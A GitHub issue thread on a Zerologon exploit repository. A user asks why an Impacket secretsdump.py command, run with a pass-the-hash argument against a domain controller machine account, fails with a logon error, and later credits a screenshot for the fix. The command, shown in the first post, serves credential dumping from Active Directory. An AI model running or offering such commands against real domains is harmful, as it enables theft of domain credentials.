### ISSUE TITLE
Unable to impersonate users 

### ISSUE THREAD

**Issue by Fox0nTheRun** [risksense/zerologon#11]
Anyone has any idea how to fix this issue?

sudo secretsdump.py -hashes :a656220101bf64f4768fecce5a4eb5fb 'REPUBLIC/WIN-7JOIPCGL6OA$@192.168.181.138'
Impacket v0.9.23.dev1+20210518.120245.2e3cd7cd - Copyright 2020 SecureAuth Corporation

[-] RemoteOperations failed: SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
[*] Cleaning up...

**Comment by Fox0nTheRun** [comment]
Sorry I just realize what I did wrong.

**Comment by dookgit** [comment]
@Fox0nTheRun care sharing what the issue was that you did wrong?  I'm trying the same thing, and getting something similar

**Comment by Fox0nTheRun** [comment]
> @Fox0nTheRun care sharing what the issue was that you did wrong?  I'm trying the same thing, and getting something similar

@dookgit 

I used the command wrongly. Here is a screenshot of what i did.

![Screenshot_20210902-123442_Docs.jpg](https://user-images.githubusercontent.com/70911096/131782373-37fe4b0a-8754-4b33-a8bb-76ce40293f2b.jpg)

**Comment by dookgit** [comment]
Many Thanks for confirming
